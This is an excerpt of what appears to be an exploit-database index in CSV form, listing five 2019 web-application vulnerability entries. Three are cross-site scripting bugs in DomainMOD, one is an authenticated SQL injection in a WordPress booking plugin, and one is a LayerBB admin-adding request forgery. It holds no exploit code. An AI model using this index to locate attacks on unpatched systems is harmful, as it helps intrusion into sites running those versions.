46374,exploits/php/webapps/46374.txt,"DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
46375,exploits/php/webapps/46375.txt,"DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80
46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80

Can't render this file because it is too large.